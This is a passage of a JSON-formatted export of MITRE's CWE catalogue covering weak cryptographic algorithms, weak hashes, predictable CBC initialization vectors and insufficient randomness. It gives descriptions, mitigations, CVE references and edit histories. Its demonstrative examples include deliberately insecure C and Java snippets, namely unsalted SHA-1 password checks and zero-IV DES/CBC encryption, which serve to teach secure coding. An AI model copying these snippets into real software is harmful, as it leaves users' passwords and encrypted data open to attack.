ASCSM"},"Entry_ID":"ASCSM-CWE-327"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"20"}},{"attr":{"@_CAPEC_ID":"459"}},{"attr":{"@_CAPEC_ID":"473"}},{"attr":{"@_CAPEC_ID":"475"}},{"attr":{"@_CAPEC_ID":"608"}},{"attr":{"@_CAPEC_ID":"614"}},{"attr":{"@_CAPEC_ID":"97"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-280"}},{"attr":{"@_External_Reference_ID":"REF-281"}},{"attr":{"@_External_Reference_ID":"REF-282"}},{"attr":{"@_External_Reference_ID":"REF-267"}},{"attr":{"@_External_Reference_ID":"REF-284"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 8, &#34;Cryptographic Foibles&#34; Page 259"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 21: Using the Wrong Cryptography.&#34; Page 315"}},{"attr":{"@_External_Reference_ID":"REF-287"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 2, &#34;Insufficient or Obsolete Encryption&#34;, Page 44"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-327"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Notes":{"Note":{"#text":"Since CWE 4.4, various cryptography-related entries, including CWE-327 and CWE-1240, have been slated for extensive research, analysis, and community consultation to define consistent terminology, improve relationships, and reduce overlap or duplication. As of CWE 4.6, this work is still ongoing.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Background_Details, Common_Consequences, Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Demonstrative_Examples, Description, Observed_Examples, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Maintenance_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Detection_Factors, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Applicable_Platforms, Potential_Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Detection_Factors, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Detection_Factors, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Detection_Factors, Maintenance_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated References"}],"Previous_Entry_Name":{"#text":"Using a Broken or Risky Cryptographic Algorithm","attr":{"@_Date":"2008-04-11"}}}},"328":{"attr":{"@_ID":"328","@_Name":"Use of Weak Hash","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product uses an algorithm that produces a digest (output value) that does not meet security expectations for a hash function that allows an adversary to reasonably determine the original input (preimage attack), find another input that can produce the same hash (2nd preimage attack), or find multiple inputs that evaluate to the same hash (birthday attack).","Extended_Description":{"xhtml:p":["A hash function is defined as an algorithm that maps arbitrarily sized data into a fixed-sized digest (output) such that the following properties hold:","Building on this definition, a cryptographic hash function must also ensure that a malicious actor cannot leverage the hash function to have a reasonable chance of success at determining any of the following:","What is regarded as \\"reasonable\\" varies by context and threat model, but in general, \\"reasonable\\" could cover any attack that is more efficient than brute force (i.e., on average, attempting half of all possible combinations). Note that some attacks might be more efficient than brute force but are still not regarded as achievable in the real world.","Any algorithm does not meet the above conditions will generally be considered weak for general use in hashing.","In addition to algorithmic weaknesses, a hash function can be made weak by using the hash in a security context that breaks its security guarantees. For example, using a hash function without a salt for storing passwords (that are sufficiently short) could enable an adversary to create a \\"rainbow table\\" [REF-637] to recover the password under certain conditions; this attack works against such hash functions as MD5, SHA-1, and SHA-2."],"xhtml:ul":[{"xhtml:li":["1. The algorithm is not invertible (also called \\"one-way\\" or \\"not reversible\\")","2. The algorithm is deterministic; the same input produces the same digest every time"]},{"xhtml:li":["1. the original input (preimage attack), given only the digest","2. another input that can produce the same digest (2nd preimage attack), given the original input","3. a set of two or more inputs that evaluate to the same digest (birthday attack), given the actor can arbitrarily choose the inputs to be hashed and can do so a reasonable amount of times"]}]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"326","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"327","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-51"},"Phase":"Architecture and Design","Description":{"xhtml:p":["Use an adaptive hash function that can be configured to change the amount of computational effort needed to compute the hash, such as the number of iterations (\\"stretching\\") or the amount of memory required. Some hash functions perform salting automatically. These functions can significantly increase the overhead for a brute force attack compared to intentionally-fast functions such as MD5. For example, rainbow table attacks can become infeasible due to the high computing overhead. Finally, since computing power gets faster and cheaper over time, the technique can be reconfigured to increase the workload without forcing an entire replacement of the algorithm in use.","Some hash functions that have one or more of these desired properties include bcrypt [REF-291], scrypt [REF-292], and PBKDF2 [REF-293]. While there is active debate about which of these is the most effective, they are all stronger than using salts with hash functions with very little computing overhead.","Note that using these functions can have an impact on performance, so they require special consideration to avoid denial-of-service attacks. However, their configurability provides finer control over how much CPU and memory is used, so it could be adjusted to suit the environment\'s needs."]},"Effectiveness":"High"}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-101"},"Intro_Text":"In both of these examples, a user is logged in if their given password matches a stored password:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"unsigned char *check_passwd(char *plaintext) {}","xhtml:div":{"#text":"ctext = simple_digest(\\"sha1\\",plaintext,strlen(plaintext), ... );if (equal(ctext, secret_password())) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:i":"//Login if hash matches stored hash","xhtml:div":{"#text":"login_user();","attr":{"@_style":"margin-left:10px;"}}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String plainText = new String(plainTextIn);MessageDigest encer = MessageDigest.getInstance(\\"SHA\\");encer.update(plainTextIn);byte[] digest = password.digest();if (equal(digest,secret_password())) {}","xhtml:br":["","","","",""],"xhtml:i":"//Login if hash matches stored hash","xhtml:div":{"#text":"login_user();","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":"This code relies exclusively on a password mechanism (CWE-309) using only one factor of authentication (CWE-308). If an attacker can steal or guess a user\'s password, they are given full access to their account. Note this code also uses SHA-1, which is a weak hash (CWE-328).  It also does not use a salt (CWE-759)."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-4900","Description":"SHA-1 algorithm is not collision-resistant.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4900"},{"Reference":"CVE-2020-25685","Description":"DNS product uses a weak hash (CRC32 or SHA-1) of the query name, allowing attacker to forge responses by computing domain names with the same hash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25685"},{"Reference":"CVE-2012-6707","Description":"blogging product uses MD5-based algorithm for passwords.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6707"},{"Reference":"CVE-2019-14855","Description":"forging of certificate signatures using SHA-1 collisions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14855"},{"Reference":"CVE-2017-15999","Description":"mobile app for backup sends SHA-1 hash of password in cleartext.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15999"},{"Reference":"CVE-2006-4068","Description":"Hard-coded hashed values for username and password contained in client-side script, allowing brute-force offline attacks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4068"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Reversible One-Way Hash"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"461"}},{"attr":{"@_CAPEC_ID":"68"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-289"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 2, &#34;Common Vulnerabilities of Integrity&#34;, Page 47"}},{"attr":{"@_External_Reference_ID":"REF-291"}},{"attr":{"@_External_Reference_ID":"REF-292"}},{"attr":{"@_External_Reference_ID":"REF-293","@_Section":"5.2 PBKDF2"}},{"attr":{"@_External_Reference_ID":"REF-294"}},{"attr":{"@_External_Reference_ID":"REF-295"}},{"attr":{"@_External_Reference_ID":"REF-296"}},{"attr":{"@_External_Reference_ID":"REF-297"}},{"attr":{"@_External_Reference_ID":"REF-298"}},{"attr":{"@_External_Reference_ID":"REF-637"}},{"attr":{"@_External_Reference_ID":"REF-1243"}},{"attr":{"@_External_Reference_ID":"REF-1244"}}]},"Notes":{"Note":{"#text":"Since CWE 4.4, various cryptography-related entries including CWE-328 have been slated for extensive research, analysis, and community consultation to define consistent terminology, improve relationships, and reduce overlap or duplication. As of CWE 4.6, this work is still ongoing.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Observed_Example, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Description, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"329":{"attr":{"@_ID":"329","@_Name":"Generation of Predictable IV with CBC Mode","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product generates and uses a predictable initialization Vector (IV) with Cipher Block Chaining (CBC) Mode, which causes algorithms to be susceptible to dictionary attacks when they are encrypted under the same key.","Extended_Description":{"xhtml:p":"CBC mode eliminates a weakness of Electronic Code\\n\\t   Book (ECB) mode by allowing identical plaintext blocks to\\n\\t   be encrypted to different ciphertext blocks. This is\\n\\t   possible by the XOR-ing of an IV with the initial plaintext\\n\\t   block so that every plaintext block in the chain is XOR\'d\\n\\t   with a different value before encryption. If IVs are\\n\\t   reused, then identical plaintexts would be encrypted to\\n\\t   identical ciphertexts. However, even if IVs are not\\n\\t   identical but are predictable, then they still break the\\n\\t   security of CBC mode against Chosen Plaintext Attacks\\n\\t   (CPA)."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1204","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":{"xhtml:p":["CBC mode is a commonly used mode of operation for a\\n\\t      block cipher. It works by XOR-ing an IV with the initial\\n\\t      block of a plaintext prior to encryption and then\\n\\t      XOR-ing each successive block of plaintext with the\\n\\t      previous block of ciphertext before encryption.","When used properly, CBC mode provides security against\\n\\t\\tchosen plaintext attacks. Having an unpredictable IV\\n\\t\\tis a crucial underpinning of this. See [REF-1171]."],"xhtml:div":{"#text":"C_0 = IVC_i = E_k{M_i XOR C_{i-1}}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"Designers might assume a non-cryptographic context for a cryptographic variable."},{"Phase":"Implementation","Note":"Developers might dismiss the importance of an unpredictable IV and choose an easier implementation to save effort, weakening the scheme in the process."}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"If the IV is not properly initialized, data that is encrypted can be compromised and leak information."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"NIST recommends two methods of generating unpredictable IVs for CBC mode [REF-1172]. The first is to generate the IV randomly. The second method is to encrypt a nonce with the same key and cipher to be used to encrypt the plaintext. In this case the nonce must be unique but can be predictable, since the block cipher will act as a pseudo random permutation."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-143"},"Intro_Text":"In the following examples, CBC mode is used when encrypting data:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"EVP_CIPHER_CTX ctx;char key[EVP_MAX_KEY_LENGTH];char iv[EVP_MAX_IV_LENGTH];RAND_bytes(key, b);memset(iv,0,EVP_MAX_IV_LENGTH);EVP_EncryptInit(&amp;ctx,EVP_bf_cbc(), key,iv);","xhtml:br":["","","","",""]}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class SymmetricCipherTest {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"public static void main() {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"byte[] text =\\"Secret\\".getBytes();byte[] iv ={};KeyGenerator kg = KeyGenerator.getInstance(\\"DES\\");kg.init(56);SecretKey key = kg.generateKey();Cipher cipher = Cipher.getInstance(\\"DES/CBC/PKCS5Padding\\");IvParameterSpec ips = new IvParameterSpec(iv);cipher.init(Cipher.ENCRYPT_MODE, key, ips);return cipher.doFinal(inpBytes);","xhtml:br":["","","","","","","","",""],"xhtml:div":{"#text":"0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00","attr":{"@_style":"margin-left:10px;"}}}}}}}}],"Body_Text":"In both of these examples, the initialization vector (IV) is always a block of zeros. This makes the resulting cipher text much more predictable and susceptible to a dictionary attack."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2020-5408","Description":"encryption functionality in an authentication framework uses a fixed null IV with CBC mode, allowing attackers to decrypt traffic in applications that use this functionality","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5408"},{"Reference":"CVE-2017-17704","Description":"messages for a door-unlocking product use a fixed IV in CBC mode, which is the same after each restart","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17704"},{"Reference":"CVE-2017-11133","Description":"application uses AES in CBC mode, but the pseudo-random secret and IV are generated using math.random, which is not cryptographically strong.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11133"},{"Reference":"CVE-2007-3528","Description":"Blowfish-CBC implementation constructs an IV where each byte is calculated modulo 8 instead of modulo 256, resulting in less than 12 bits for the effective IV length, and less than 4096 possible IV values.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3528"},{"Reference":"CVE-2011-3389","Description":"BEAST attack in SSL 3.0 / TLS 1.0. In CBC mode, chained initialization vectors are non-random, allowing decryption of HTTPS traffic using a chosen plaintext attack.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3389"}]},"Functional_Areas":{"Functional_Area":"Cryptography"},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Not using a random IV with CBC mode"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 2, &#34;Initialization Vectors&#34;, Page 42"}},{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-1171"}},{"attr":{"@_External_Reference_ID":"REF-1172","@_Section":"Appendix C"}}]},"Notes":{"Note":{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t   predictability can vary widely. Within the developer and other\\n\\t   communities, \\"randomness\\" is used heavily. However, within\\n\\t   cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t   measurement. There are no commonly-used definitions, even within\\n\\t   standards documents and cryptography papers. Future versions of\\n\\t   CWE will attempt to define these terms and, if necessary,\\n\\t   distinguish between them in ways that are appropriate for\\n\\t   different communities but do not reduce the usability of CWE for\\n\\t   mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Background_Details, Common_Consequences, Functional_Areas, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Background_Details, Common_Consequences, Demonstrative_Examples, Description, Modes_of_Introduction, Name, Observed_Examples, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Description, Maintenance_Notes, Name, References"}],"Previous_Entry_Name":[{"#text":"Not Using a Random IV with CBC Mode","attr":{"@_Date":"2021-03-15"}},{"#text":"Not Using an Unpredictable IV with CBC Mode","attr":{"@_Date":"2021-07-20"}}]}},"330":{"attr":{"@_ID":"330","@_Name":"Use of Insufficiently Random Values","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Stable"},"Description":"The software uses insufficiently random numbers or values in a security context that depends on unpredictable numbers.","Extended_Description":"When software generates predictable values in a context requiring unpredictability, it may be possible for an attacker to guess the next value that will be generated, and use this guess to impersonate another user or access sensitive information.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"Computers are deterministic machines, and as such are unable to produce true randomness. Pseudo-Random Number Generators (PRNGs) approximate randomness algorithmically, starting with a seed from which subsequent values are calculated. There are two types of PRNGs: statistical and cryptographic. Statistical PRNGs provide useful statistical properties, but their output is highly predictable and forms an easy to reproduce numeric stream that is unsuitable for use in cases where security depends on generated values being unpredictable. Cryptographic PRNGs address this problem by generating output that is more difficult to predict. For a value to be cryptographically secure, it must be impossible or highly improbable for an attacker to distinguish between it and a truly random value."},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":["Confidentiality","Other"],"Impact":"Other","Note":"When a protection mechanism relies on random values to restrict access to a sensitive resource, such as a session ID or a seed for generating a cryptographic key, then the resource being protected could be accessed by guessing the ID or key."},{"Scope":["Access Control","Other"],"Impact":["Bypass Protection Mechanism","Other"],"Note":"If software relies on unique, unguessable IDs to identify a resource, an attacker might be able to guess an ID for a resource that is owned by another user. The attacker could then read the resource, or pre-create a resource with the same ID to prevent the legitimate program from properly sending the resource to the intended user. For example, a product might maintain session information in a file whose name is based on a username. An attacker could pre-create this file for a victim user, then set the permissions so that the application cannot generate the session for the victim, preventing the victim from using the application."},{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"],"Note":"When an authorization or authentication mechanism relies on random values to restrict access to restricted functionality, such as a session ID or a seed for generating a cryptographic key, then an attacker may access the restricted functionality by guessing the ID or key."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-11.4"},"Method":"Black Box","Description":{"xhtml:p":["Use monitoring tools that examine the software\'s process as it interacts with the operating system and the network. This technique is useful in cases when source code is unavailable, if the software was not developed by you, or if you want to verify that the build phase did not introduce any new weaknesses. Examples include debuggers that directly attach to the running process; system-call tracing utilities such as truss (Solaris) and strace (Linux); system activity monitors such as FileMon, RegMon, Process Monitor, and other Sysinternals utilities (Windows); and sniffers and protocol analyzers that monitor network traffic.","Attach the monitor to the process and look for library functions that indicate when randomness is being used. Run the process multiple times to see if the seed changes. Look for accesses of devices or equivalent resources that are commonly used for strong (or weak) randomness, such as /dev/urandom on Linux. Look for library or system calls that access predictable information such as process IDs and system time."]}},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Man-in-the-middle attack tool"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Focused Manual Spotcheck - Focused manual analysis of source","Manual Source Code Review (not inspections)"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":{"xhtml:p":["Use a well-vetted algorithm that is currently considered to be strong by experts in the field, and select well-tested implementations with adequate length seeds.","In general, if a pseudo-random number generator is not advertised as being cryptographically secure, then it is probably a statistical PRNG and should not be used in security-sensitive contexts.","Pseudo-random number generators can produce predictable numbers if the generator is known and the seed can be guessed. A 256-bit seed is a good starting point for producing a \\"random enough\\" number."]}},{"Phase":"Implementation","Description":"Consider a PRNG that re-seeds itself as needed from high quality pseudo-random output sources, such as hardware devices."},{"Phase":"Testing","Description":"Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% 